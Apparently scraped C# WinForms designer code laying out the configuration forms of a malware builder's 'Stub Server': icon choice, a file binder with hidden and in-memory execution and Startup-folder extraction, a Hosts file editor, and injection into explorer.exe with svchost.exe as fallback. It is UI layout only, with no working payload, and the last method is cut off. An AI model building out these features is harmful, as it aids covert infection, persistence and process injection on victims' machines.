/// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     this.components = new System.ComponentModel.Container();
     System.Windows.Forms.ListViewItem listViewItem1 = new System.Windows.Forms.ListViewItem("");
     System.Windows.Forms.ListViewItem listViewItem2 = new System.Windows.Forms.ListViewItem("");
     System.Windows.Forms.ListViewItem listViewItem3 = new System.Windows.Forms.ListViewItem("");
     this.panel3  = new System.Windows.Forms.Panel();
     this.button1 = new System.Windows.Forms.Button();
     this.DeleteSelectedButton = new System.Windows.Forms.Button();
     this.AddFileButton        = new System.Windows.Forms.Button();
     this.imageList1           = new System.Windows.Forms.ImageList(this.components);
     this.panel1       = new System.Windows.Forms.Panel();
     this.pictureBox1  = new System.Windows.Forms.PictureBox();
     this.radioButton2 = new System.Windows.Forms.RadioButton();
     this.radioButton1 = new System.Windows.Forms.RadioButton();
     this.listView1    = new PpRStandardLib.Controls.FullListView();
     this.panel3.SuspendLayout();
     this.panel1.SuspendLayout();
     ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit();
     this.SuspendLayout();
     //
     // panel3
     //
     this.panel3.Controls.Add(this.button1);
     this.panel3.Controls.Add(this.DeleteSelectedButton);
     this.panel3.Controls.Add(this.AddFileButton);
     this.panel3.Dock     = System.Windows.Forms.DockStyle.Bottom;
     this.panel3.Location = new System.Drawing.Point(0, 294);
     this.panel3.Name     = "panel3";
     this.panel3.Size     = new System.Drawing.Size(428, 30);
     this.panel3.TabIndex = 29;
     //
     // button1
     //
     this.button1.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.button1.Location = new System.Drawing.Point(161, 3);
     this.button1.Name     = "button1";
     this.button1.Size     = new System.Drawing.Size(75, 23);
     this.button1.TabIndex = 3;
     this.button1.Text     = "Refresh";
     this.button1.UseVisualStyleBackColor = true;
     //
     // DeleteSelectedButton
     //
     this.DeleteSelectedButton.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.DeleteSelectedButton.Location = new System.Drawing.Point(80, 3);
     this.DeleteSelectedButton.Name     = "DeleteSelectedButton";
     this.DeleteSelectedButton.Size     = new System.Drawing.Size(75, 23);
     this.DeleteSelectedButton.TabIndex = 1;
     this.DeleteSelectedButton.Text     = "Delete";
     this.DeleteSelectedButton.UseVisualStyleBackColor = true;
     //
     // AddFileButton
     //
     this.AddFileButton.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.AddFileButton.Location = new System.Drawing.Point(-1, 3);
     this.AddFileButton.Name     = "AddFileButton";
     this.AddFileButton.Size     = new System.Drawing.Size(75, 23);
     this.AddFileButton.TabIndex = 0;
     this.AddFileButton.Text     = "Add Icon";
     this.AddFileButton.UseVisualStyleBackColor = true;
     //
     // imageList1
     //
     this.imageList1.ColorDepth       = System.Windows.Forms.ColorDepth.Depth8Bit;
     this.imageList1.ImageSize        = new System.Drawing.Size(48, 47);
     this.imageList1.TransparentColor = System.Drawing.Color.Transparent;
     //
     // panel1
     //
     this.panel1.Controls.Add(this.pictureBox1);
     this.panel1.Controls.Add(this.radioButton2);
     this.panel1.Controls.Add(this.radioButton1);
     this.panel1.Dock     = System.Windows.Forms.DockStyle.Top;
     this.panel1.Location = new System.Drawing.Point(0, 0);
     this.panel1.Name     = "panel1";
     this.panel1.Size     = new System.Drawing.Size(428, 69);
     this.panel1.TabIndex = 27;
     //
     // pictureBox1
     //
     this.pictureBox1.BorderStyle = System.Windows.Forms.BorderStyle.FixedSingle;
     this.pictureBox1.Location    = new System.Drawing.Point(0, 0);
     this.pictureBox1.Name        = "pictureBox1";
     this.pictureBox1.Size        = new System.Drawing.Size(64, 64);
     this.pictureBox1.TabIndex    = 1;
     this.pictureBox1.TabStop     = false;
     //
     // radioButton2
     //
     this.radioButton2.AutoSize = true;
     this.radioButton2.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.radioButton2.Location = new System.Drawing.Point(74, 28);
     this.radioButton2.Name     = "radioButton2";
     this.radioButton2.Size     = new System.Drawing.Size(93, 19);
     this.radioButton2.TabIndex = 3;
     this.radioButton2.Text     = "Custom Icon";
     this.radioButton2.UseVisualStyleBackColor = true;
     //
     // radioButton1
     //
     this.radioButton1.AutoSize = true;
     this.radioButton1.Checked  = true;
     this.radioButton1.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.radioButton1.Location = new System.Drawing.Point(74, 3);
     this.radioButton1.Name     = "radioButton1";
     this.radioButton1.Size     = new System.Drawing.Size(89, 19);
     this.radioButton1.TabIndex = 2;
     this.radioButton1.TabStop  = true;
     this.radioButton1.Text     = "Default Icon";
     this.radioButton1.UseVisualStyleBackColor = true;
     //
     // listView1
     //
     this.listView1.Dock                     = System.Windows.Forms.DockStyle.Fill;
     this.listView1.ExplorerTheme            = false;
     this.listView1.ExplorerThemeMultiSelect = false;
     this.listView1.Font                     = new System.Drawing.Font("Segoe UI", 9F);
     this.listView1.FullRowSelect            = true;
     this.listView1.ItemContextMenuStrip     = false;
     this.listView1.Items.AddRange(new System.Windows.Forms.ListViewItem[] {
         listViewItem1,
         listViewItem2,
         listViewItem3
     });
     this.listView1.LargeImageList = this.imageList1;
     this.listView1.Location       = new System.Drawing.Point(0, 69);
     this.listView1.LockColumnSize = false;
     this.listView1.MultiSelect    = false;
     this.listView1.Name           = "listView1";
     this.listView1.Size           = new System.Drawing.Size(428, 225);
     this.listView1.TabIndex       = 32;
     this.listView1.UseCompatibleStateImageBehavior = false;
     //
     // create_stub_ChooseIcon
     //
     this.AutoScaleDimensions = new System.Drawing.SizeF(7F, 15F);
     this.AutoScaleMode       = System.Windows.Forms.AutoScaleMode.Font;
     this.Controls.Add(this.listView1);
     this.Controls.Add(this.panel3);
     this.Controls.Add(this.panel1);
     this.Font  = new System.Drawing.Font("Segoe UI", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.Name  = "create_stub_ChooseIcon";
     this.Size  = new System.Drawing.Size(428, 324);
     this.Load += new System.EventHandler(this.StubsIcon_Load);
     this.panel3.ResumeLayout(false);
     this.panel1.ResumeLayout(false);
     this.panel1.PerformLayout();
     ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit();
     this.ResumeLayout(false);
 }
예제 #2
0
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     System.Windows.Forms.ListViewItem listViewItem1 = new System.Windows.Forms.ListViewItem(new string[] {
         "GetProdID.bat",
         "1",
         "%LocalAppData%",
         "10 KB",
         "Windows Batch File",
         "Shell Execute (Visible)",
         "/f /s /1"
     }, -1);
     this.FileBinderContext  = new System.Windows.Forms.ContextMenu();
     this.menuItem3          = new System.Windows.Forms.MenuItem();
     this.menuItem4          = new System.Windows.Forms.MenuItem();
     this.menuItem1          = new System.Windows.Forms.MenuItem();
     this.menuItem2          = new System.Windows.Forms.MenuItem();
     this.FileNameColumn     = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
     this.OrderColumn        = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
     this.DestinationColumn  = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
     this.SizeColumn         = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
     this.TypeColumn         = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
     this.button12           = new System.Windows.Forms.Button();
     this.textBox1           = new System.Windows.Forms.TextBox();
     this.AddFileButton      = new System.Windows.Forms.Button();
     this.ExecutionColumn    = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
     this.ParameterColumn    = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
     this.label7             = new System.Windows.Forms.Label();
     this.openFileDialog1    = new System.Windows.Forms.OpenFileDialog();
     this.FileBinderListView = new PpRStandardLib.Controls.FullListView();
     this.checkBox2          = new System.Windows.Forms.CheckBox();
     this.textBox2           = new System.Windows.Forms.TextBox();
     this.label5             = new System.Windows.Forms.Label();
     this.comboBox1          = new System.Windows.Forms.ComboBox();
     this.label4             = new System.Windows.Forms.Label();
     this.comboBox2          = new System.Windows.Forms.ComboBox();
     this.label6             = new System.Windows.Forms.Label();
     this.SuspendLayout();
     //
     // FileBinderContext
     //
     this.FileBinderContext.MenuItems.AddRange(new System.Windows.Forms.MenuItem[] {
         this.menuItem3,
         this.menuItem4,
         this.menuItem1,
         this.menuItem2
     });
     //
     // menuItem3
     //
     this.menuItem3.Index = 0;
     this.menuItem3.Text  = "Edit";
     //
     // menuItem4
     //
     this.menuItem4.Index = 1;
     this.menuItem4.Text  = "-";
     //
     // menuItem1
     //
     this.menuItem1.Index = 2;
     this.menuItem1.Text  = "Remove";
     //
     // menuItem2
     //
     this.menuItem2.Index = 3;
     this.menuItem2.Text  = "Clear All";
     //
     // FileNameColumn
     //
     this.FileNameColumn.Text  = "File Name";
     this.FileNameColumn.Width = 129;
     //
     // OrderColumn
     //
     this.OrderColumn.Text  = "#";
     this.OrderColumn.Width = 26;
     //
     // DestinationColumn
     //
     this.DestinationColumn.Text  = "Destination";
     this.DestinationColumn.Width = 108;
     //
     // SizeColumn
     //
     this.SizeColumn.Text  = "Size";
     this.SizeColumn.Width = 56;
     //
     // TypeColumn
     //
     this.TypeColumn.Text  = "Type";
     this.TypeColumn.Width = 98;
     //
     // button12
     //
     this.button12.Anchor   = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Right)));
     this.button12.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.button12.Location = new System.Drawing.Point(318, 275);
     this.button12.Name     = "button12";
     this.button12.Size     = new System.Drawing.Size(29, 23);
     this.button12.TabIndex = 58;
     this.button12.Text     = "...";
     this.button12.UseVisualStyleBackColor = true;
     //
     // textBox1
     //
     this.textBox1.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Left)
                                                                  | System.Windows.Forms.AnchorStyles.Right)));
     this.textBox1.BackColor = System.Drawing.SystemColors.Window;
     this.textBox1.Font      = new System.Drawing.Font("Segoe UI", 9F);
     this.textBox1.Location  = new System.Drawing.Point(0, 275);
     this.textBox1.Name      = "textBox1";
     this.textBox1.ReadOnly  = true;
     this.textBox1.Size      = new System.Drawing.Size(312, 23);
     this.textBox1.TabIndex  = 57;
     //
     // AddFileButton
     //
     this.AddFileButton.Anchor   = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Right)));
     this.AddFileButton.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.AddFileButton.Location = new System.Drawing.Point(353, 275);
     this.AddFileButton.Name     = "AddFileButton";
     this.AddFileButton.Size     = new System.Drawing.Size(75, 23);
     this.AddFileButton.TabIndex = 0;
     this.AddFileButton.Text     = "+/Update";
     this.AddFileButton.UseVisualStyleBackColor = true;
     //
     // ExecutionColumn
     //
     this.ExecutionColumn.Text  = "Execution";
     this.ExecutionColumn.Width = 135;
     //
     // ParameterColumn
     //
     this.ParameterColumn.Text  = "Parameter";
     this.ParameterColumn.Width = 139;
     //
     // label7
     //
     this.label7.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left)
                                                                | System.Windows.Forms.AnchorStyles.Right)));
     this.label7.BorderStyle = System.Windows.Forms.BorderStyle.Fixed3D;
     this.label7.FlatStyle   = System.Windows.Forms.FlatStyle.System;
     this.label7.Location    = new System.Drawing.Point(0, 302);
     this.label7.Name        = "label7";
     this.label7.Size        = new System.Drawing.Size(430, 2);
     this.label7.TabIndex    = 38;
     this.label7.Text        = "label7";
     //
     // openFileDialog1
     //
     this.openFileDialog1.FileName = "openFileDialog1";
     //
     // FileBinderListView
     //
     this.FileBinderListView.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
                                                                             | System.Windows.Forms.AnchorStyles.Left)
                                                                            | System.Windows.Forms.AnchorStyles.Right)));
     this.FileBinderListView.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] {
         this.FileNameColumn,
         this.OrderColumn,
         this.DestinationColumn,
         this.SizeColumn,
         this.TypeColumn,
         this.ExecutionColumn,
         this.ParameterColumn
     });
     this.FileBinderListView.ExplorerTheme            = false;
     this.FileBinderListView.ExplorerThemeMultiSelect = false;
     this.FileBinderListView.Font                 = new System.Drawing.Font("Segoe UI", 9F);
     this.FileBinderListView.FullRowSelect        = true;
     this.FileBinderListView.ItemContextMenuStrip = false;
     listViewItem1.StateImageIndex                = 0;
     this.FileBinderListView.Items.AddRange(new System.Windows.Forms.ListViewItem[] {
         listViewItem1
     });
     this.FileBinderListView.Location       = new System.Drawing.Point(0, 43);
     this.FileBinderListView.LockColumnSize = false;
     this.FileBinderListView.MultiSelect    = false;
     this.FileBinderListView.Name           = "FileBinderListView";
     this.FileBinderListView.Size           = new System.Drawing.Size(428, 227);
     this.FileBinderListView.TabIndex       = 36;
     this.FileBinderListView.UseCompatibleStateImageBehavior = false;
     this.FileBinderListView.View = System.Windows.Forms.View.Details;
     //
     // checkBox2
     //
     this.checkBox2.Anchor   = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left)));
     this.checkBox2.AutoSize = true;
     this.checkBox2.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.checkBox2.Location = new System.Drawing.Point(0, 305);
     this.checkBox2.Name     = "checkBox2";
     this.checkBox2.Size     = new System.Drawing.Size(271, 19);
     this.checkBox2.TabIndex = 37;
     this.checkBox2.Text     = "Execute Binder everytime the Stub Server starts";
     this.checkBox2.UseVisualStyleBackColor = true;
     //
     // textBox2
     //
     this.textBox2.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.textBox2.Location = new System.Drawing.Point(274, 15);
     this.textBox2.Name     = "textBox2";
     this.textBox2.Size     = new System.Drawing.Size(154, 23);
     this.textBox2.TabIndex = 55;
     //
     // label5
     //
     this.label5.AutoSize = true;
     this.label5.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.label5.Location = new System.Drawing.Point(271, -1);
     this.label5.Name     = "label5";
     this.label5.Size     = new System.Drawing.Size(64, 15);
     this.label5.TabIndex = 56;
     this.label5.Text     = "Parameter:";
     //
     // comboBox1
     //
     this.comboBox1.DropDownStyle     = System.Windows.Forms.ComboBoxStyle.DropDownList;
     this.comboBox1.Font              = new System.Drawing.Font("Segoe UI", 9F);
     this.comboBox1.FormattingEnabled = true;
     this.comboBox1.Items.AddRange(new object[] {
         "Shell Execute (Visible)",
         "Shell Execute (Hidden)",
         "Execute To Memory",
         "Extract Only"
     });
     this.comboBox1.Location = new System.Drawing.Point(0, 15);
     this.comboBox1.Name     = "comboBox1";
     this.comboBox1.Size     = new System.Drawing.Size(142, 23);
     this.comboBox1.TabIndex = 57;
     //
     // label4
     //
     this.label4.AutoSize = true;
     this.label4.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.label4.Location = new System.Drawing.Point(-3, -1);
     this.label4.Name     = "label4";
     this.label4.Size     = new System.Drawing.Size(61, 15);
     this.label4.TabIndex = 58;
     this.label4.Text     = "Execution:";
     //
     // comboBox2
     //
     this.comboBox2.DropDownStyle     = System.Windows.Forms.ComboBoxStyle.DropDownList;
     this.comboBox2.Font              = new System.Drawing.Font("Segoe UI", 9F);
     this.comboBox2.FormattingEnabled = true;
     this.comboBox2.Items.AddRange(new object[] {
         "%HomeDrive%",
         "%AppData%",
         "%LocalAppData%",
         "%ProgramData%",
         "%ProgramFiles%",
         "%ProgramFiles%",
         "%SystemRoot%",
         "%UserProfile%",
         "%Public%",
         "%Temp%",
         "%Path%",
         "Startup Directory",
         "My Documents",
         "Stub Server Path"
     });
     this.comboBox2.Location = new System.Drawing.Point(148, 15);
     this.comboBox2.Name     = "comboBox2";
     this.comboBox2.Size     = new System.Drawing.Size(120, 23);
     this.comboBox2.TabIndex = 59;
     //
     // label6
     //
     this.label6.AutoSize = true;
     this.label6.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.label6.Location = new System.Drawing.Point(145, -1);
     this.label6.Name     = "label6";
     this.label6.Size     = new System.Drawing.Size(98, 15);
     this.label6.TabIndex = 60;
     this.label6.Text     = "Extraction Folder:";
     //
     // create_stub_FileBinder
     //
     this.AutoScaleDimensions = new System.Drawing.SizeF(7F, 15F);
     this.AutoScaleMode       = System.Windows.Forms.AutoScaleMode.Font;
     this.Controls.Add(this.button12);
     this.Controls.Add(this.label6);
     this.Controls.Add(this.textBox1);
     this.Controls.Add(this.AddFileButton);
     this.Controls.Add(this.comboBox2);
     this.Controls.Add(this.label4);
     this.Controls.Add(this.label7);
     this.Controls.Add(this.comboBox1);
     this.Controls.Add(this.label5);
     this.Controls.Add(this.FileBinderListView);
     this.Controls.Add(this.textBox2);
     this.Controls.Add(this.checkBox2);
     this.Font  = new System.Drawing.Font("Segoe UI", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.Name  = "create_stub_FileBinder";
     this.Size  = new System.Drawing.Size(428, 324);
     this.Load += new System.EventHandler(this.FileBinder_Load);
     this.ResumeLayout(false);
     this.PerformLayout();
 }
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     System.Windows.Forms.ListViewItem listViewItem1 = new System.Windows.Forms.ListViewItem(new string[] {
         "127.0.0.1",
         "www.domain.com"
     }, -1);
     this.HostsEditorListView = new PpRStandardLib.Controls.FullListView();
     this.IPAddressColumn     = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
     this.DomainNameColumn    = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
     this.checkBox1           = new System.Windows.Forms.CheckBox();
     this.contextMenu1        = new System.Windows.Forms.ContextMenu();
     this.menuItem1           = new System.Windows.Forms.MenuItem();
     this.menuItem2           = new System.Windows.Forms.MenuItem();
     this.menuItem3           = new System.Windows.Forms.MenuItem();
     this.menuItem4           = new System.Windows.Forms.MenuItem();
     this.button1             = new System.Windows.Forms.Button();
     this.label2    = new System.Windows.Forms.Label();
     this.textBox2  = new System.Windows.Forms.TextBox();
     this.textBox1  = new System.Windows.Forms.TextBox();
     this.label1    = new System.Windows.Forms.Label();
     this.groupBox1 = new System.Windows.Forms.GroupBox();
     this.textBox3  = new System.Windows.Forms.TextBox();
     this.groupBox1.SuspendLayout();
     this.SuspendLayout();
     //
     // HostsEditorListView
     //
     this.HostsEditorListView.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] {
         this.IPAddressColumn,
         this.DomainNameColumn
     });
     this.HostsEditorListView.ExplorerTheme            = false;
     this.HostsEditorListView.ExplorerThemeMultiSelect = false;
     this.HostsEditorListView.Font                 = new System.Drawing.Font("Segoe UI", 9F);
     this.HostsEditorListView.FullRowSelect        = true;
     this.HostsEditorListView.HeaderStyle          = System.Windows.Forms.ColumnHeaderStyle.Nonclickable;
     this.HostsEditorListView.ItemContextMenuStrip = false;
     listViewItem1.StateImageIndex                 = 0;
     this.HostsEditorListView.Items.AddRange(new System.Windows.Forms.ListViewItem[] {
         listViewItem1
     });
     this.HostsEditorListView.Location       = new System.Drawing.Point(9, 66);
     this.HostsEditorListView.LockColumnSize = false;
     this.HostsEditorListView.MultiSelect    = false;
     this.HostsEditorListView.Name           = "HostsEditorListView";
     this.HostsEditorListView.Size           = new System.Drawing.Size(219, 227);
     this.HostsEditorListView.TabIndex       = 43;
     this.HostsEditorListView.UseCompatibleStateImageBehavior = false;
     this.HostsEditorListView.View = System.Windows.Forms.View.Details;
     //
     // IPAddressColumn
     //
     this.IPAddressColumn.Text  = "IP Address";
     this.IPAddressColumn.Width = 95;
     //
     // DomainNameColumn
     //
     this.DomainNameColumn.Text  = "Domain Name";
     this.DomainNameColumn.Width = 120;
     //
     // checkBox1
     //
     this.checkBox1.Anchor   = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left)));
     this.checkBox1.AutoSize = true;
     this.checkBox1.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.checkBox1.Location = new System.Drawing.Point(9, 299);
     this.checkBox1.Name     = "checkBox1";
     this.checkBox1.Size     = new System.Drawing.Size(379, 19);
     this.checkBox1.TabIndex = 18;
     this.checkBox1.Text     = "Clear the whole previous Hosts file data before writing the new one";
     this.checkBox1.UseVisualStyleBackColor = true;
     //
     // contextMenu1
     //
     this.contextMenu1.MenuItems.AddRange(new System.Windows.Forms.MenuItem[] {
         this.menuItem1,
         this.menuItem2,
         this.menuItem3,
         this.menuItem4
     });
     //
     // menuItem1
     //
     this.menuItem1.Index = 0;
     this.menuItem1.Text  = "Edit";
     //
     // menuItem2
     //
     this.menuItem2.Index = 1;
     this.menuItem2.Text  = "-";
     //
     // menuItem3
     //
     this.menuItem3.Index = 2;
     this.menuItem3.Text  = "Remove";
     //
     // menuItem4
     //
     this.menuItem4.Index = 3;
     this.menuItem4.Text  = "Clear All";
     //
     // button1
     //
     this.button1.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.button1.Location = new System.Drawing.Point(291, 36);
     this.button1.Name     = "button1";
     this.button1.Size     = new System.Drawing.Size(75, 23);
     this.button1.TabIndex = 4;
     this.button1.Text     = "+/Update";
     this.button1.UseVisualStyleBackColor = true;
     //
     // label2
     //
     this.label2.AutoSize = true;
     this.label2.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.label2.Location = new System.Drawing.Point(147, 19);
     this.label2.Name     = "label2";
     this.label2.Size     = new System.Drawing.Size(87, 15);
     this.label2.TabIndex = 2;
     this.label2.Text     = "Domain Name:";
     //
     // textBox2
     //
     this.textBox2.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.textBox2.Location = new System.Drawing.Point(150, 37);
     this.textBox2.Name     = "textBox2";
     this.textBox2.Size     = new System.Drawing.Size(135, 23);
     this.textBox2.TabIndex = 3;
     //
     // textBox1
     //
     this.textBox1.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.textBox1.Location = new System.Drawing.Point(9, 37);
     this.textBox1.Name     = "textBox1";
     this.textBox1.Size     = new System.Drawing.Size(135, 23);
     this.textBox1.TabIndex = 1;
     //
     // label1
     //
     this.label1.AutoSize = true;
     this.label1.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.label1.Location = new System.Drawing.Point(6, 19);
     this.label1.Name     = "label1";
     this.label1.Size     = new System.Drawing.Size(65, 15);
     this.label1.TabIndex = 0;
     this.label1.Text     = "IP Address:";
     //
     // groupBox1
     //
     this.groupBox1.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
                                                                    | System.Windows.Forms.AnchorStyles.Left)
                                                                   | System.Windows.Forms.AnchorStyles.Right)));
     this.groupBox1.Controls.Add(this.textBox3);
     this.groupBox1.Controls.Add(this.checkBox1);
     this.groupBox1.Controls.Add(this.label1);
     this.groupBox1.Controls.Add(this.button1);
     this.groupBox1.Controls.Add(this.textBox1);
     this.groupBox1.Controls.Add(this.textBox2);
     this.groupBox1.Controls.Add(this.label2);
     this.groupBox1.Controls.Add(this.HostsEditorListView);
     this.groupBox1.Location = new System.Drawing.Point(0, 0);
     this.groupBox1.Name     = "groupBox1";
     this.groupBox1.Size     = new System.Drawing.Size(428, 324);
     this.groupBox1.TabIndex = 106;
     this.groupBox1.TabStop  = false;
     this.groupBox1.Text     = "Hosts Editor";
     //
     // textBox3
     //
     this.textBox3.Location  = new System.Drawing.Point(234, 66);
     this.textBox3.Multiline = true;
     this.textBox3.Name      = "textBox3";
     this.textBox3.ReadOnly  = true;
     this.textBox3.Size      = new System.Drawing.Size(186, 227);
     this.textBox3.TabIndex  = 106;
     this.textBox3.Text      = "Windows Hosts file:";
     //
     // create_stub_HostsEditor
     //
     this.AutoScaleDimensions = new System.Drawing.SizeF(7F, 15F);
     this.AutoScaleMode       = System.Windows.Forms.AutoScaleMode.Font;
     this.Controls.Add(this.groupBox1);
     this.Font = new System.Drawing.Font("Segoe UI", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.Name = "create_stub_HostsEditor";
     this.Size = new System.Drawing.Size(428, 324);
     this.groupBox1.ResumeLayout(false);
     this.groupBox1.PerformLayout();
     this.ResumeLayout(false);
 }
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     System.Windows.Forms.ListViewItem listViewItem1 = new System.Windows.Forms.ListViewItem(new string[] {
         "explorer.exe",
         "Primary"
     }, -1, System.Drawing.Color.Empty, System.Drawing.Color.Empty, new System.Drawing.Font("Segoe UI", 9F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0))));
     System.Windows.Forms.ListViewItem listViewItem2 = new System.Windows.Forms.ListViewItem(new string[] {
         "svchost.exe",
         "Fallback"
     }, -1);
     this.ProcessInjectionLstView = new PpRStandardLib.Controls.FullListView();
     this.ProcessNameColumn       = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
     this.PriorityColumn          = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
     this.contextMenu1            = new System.Windows.Forms.ContextMenu();
     this.menuItem2 = new System.Windows.Forms.MenuItem();
     this.menuItem4 = new System.Windows.Forms.MenuItem();
     this.menuItem1 = new System.Windows.Forms.MenuItem();
     this.menuItem3 = new System.Windows.Forms.MenuItem();
     this.textBox1  = new System.Windows.Forms.TextBox();
     this.button1   = new System.Windows.Forms.Button();
     this.label1    = new System.Windows.Forms.Label();
     this.comboBox1 = new System.Windows.Forms.ComboBox();
     this.label4    = new System.Windows.Forms.Label();
     this.textBox2  = new System.Windows.Forms.TextBox();
     this.groupBox1 = new System.Windows.Forms.GroupBox();
     this.groupBox1.SuspendLayout();
     this.SuspendLayout();
     //
     // ProcessInjectionLstView
     //
     this.ProcessInjectionLstView.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] {
         this.ProcessNameColumn,
         this.PriorityColumn
     });
     this.ProcessInjectionLstView.ExplorerTheme            = true;
     this.ProcessInjectionLstView.ExplorerThemeMultiSelect = true;
     this.ProcessInjectionLstView.Font                 = new System.Drawing.Font("Segoe UI", 9F);
     this.ProcessInjectionLstView.FullRowSelect        = true;
     this.ProcessInjectionLstView.HeaderStyle          = System.Windows.Forms.ColumnHeaderStyle.Nonclickable;
     this.ProcessInjectionLstView.ItemContextMenuStrip = true;
     listViewItem1.StateImageIndex = 0;
     listViewItem2.StateImageIndex = 0;
     this.ProcessInjectionLstView.Items.AddRange(new System.Windows.Forms.ListViewItem[] {
         listViewItem1,
         listViewItem2
     });
     this.ProcessInjectionLstView.Location       = new System.Drawing.Point(9, 66);
     this.ProcessInjectionLstView.LockColumnSize = true;
     this.ProcessInjectionLstView.MultiSelect    = false;
     this.ProcessInjectionLstView.Name           = "ProcessInjectionLstView";
     this.ProcessInjectionLstView.Size           = new System.Drawing.Size(215, 250);
     this.ProcessInjectionLstView.TabIndex       = 155;
     this.ProcessInjectionLstView.UseCompatibleStateImageBehavior = false;
     this.ProcessInjectionLstView.View = System.Windows.Forms.View.Details;
     //
     // ProcessNameColumn
     //
     this.ProcessNameColumn.Text  = "Process Name";
     this.ProcessNameColumn.Width = 154;
     //
     // PriorityColumn
     //
     this.PriorityColumn.Text  = "Priority";
     this.PriorityColumn.Width = 57;
     //
     // contextMenu1
     //
     this.contextMenu1.MenuItems.AddRange(new System.Windows.Forms.MenuItem[] {
         this.menuItem2,
         this.menuItem4,
         this.menuItem1,
         this.menuItem3
     });
     //
     // menuItem2
     //
     this.menuItem2.Index = 0;
     this.menuItem2.Text  = "Edit";
     //
     // menuItem4
     //
     this.menuItem4.Index = 1;
     this.menuItem4.Text  = "-";
     //
     // menuItem1
     //
     this.menuItem1.Index = 2;
     this.menuItem1.Text  = "Remove";
     //
     // menuItem3
     //
     this.menuItem3.Index = 3;
     this.menuItem3.Text  = "Clear All";
     //
     // textBox1
     //
     this.textBox1.Font      = new System.Drawing.Font("Segoe UI", 9F);
     this.textBox1.Location  = new System.Drawing.Point(230, 66);
     this.textBox1.Multiline = true;
     this.textBox1.Name      = "textBox1";
     this.textBox1.ReadOnly  = true;
     this.textBox1.Size      = new System.Drawing.Size(190, 250);
     this.textBox1.TabIndex  = 157;
     this.textBox1.Text      = "Process Injection:\r\n-The Stub Server will try to inject into the process describe" +
                               "d.\r\n-If it fails, the Stub Server will attempt to inject into a \'Fallback\' proce" +
                               "ss.\r\n";
     //
     // button1
     //
     this.button1.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.button1.Location = new System.Drawing.Point(286, 37);
     this.button1.Name     = "button1";
     this.button1.Size     = new System.Drawing.Size(75, 23);
     this.button1.TabIndex = 61;
     this.button1.Text     = "+/Update";
     this.button1.UseVisualStyleBackColor = true;
     //
     // label1
     //
     this.label1.AutoSize = true;
     this.label1.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.label1.Location = new System.Drawing.Point(185, 19);
     this.label1.Name     = "label1";
     this.label1.Size     = new System.Drawing.Size(48, 15);
     this.label1.TabIndex = 60;
     this.label1.Text     = "Priority:";
     //
